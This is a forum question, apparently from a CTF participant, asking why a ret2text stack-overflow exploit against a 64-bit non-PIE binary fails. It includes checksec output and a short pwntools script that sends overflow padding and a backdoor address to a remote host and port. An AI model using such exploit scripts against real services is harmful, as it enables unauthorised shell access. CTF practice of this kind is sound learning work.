# Trying to ret2text on 64bit program issues, can't jump to shell

Tags: linux, kali-linux, code-review, ctf, rop

Here is the elf summary of the program:

```
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

This is the main function of the disassembly of the program:
[image]

This is the address of the back door:
[image]

This is my exp:

```
from pwn import *

p = remote('43.156.14.141', 1144, level='debug')

sh = 0x00000000004011dd

p.recvuntil('name:\n')
payload = b'a' * 0x40 + p64(0) + p64(sh)

p.sendline(payload)
p.interactive()
```

But I found that ret2text cannot be implemented

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.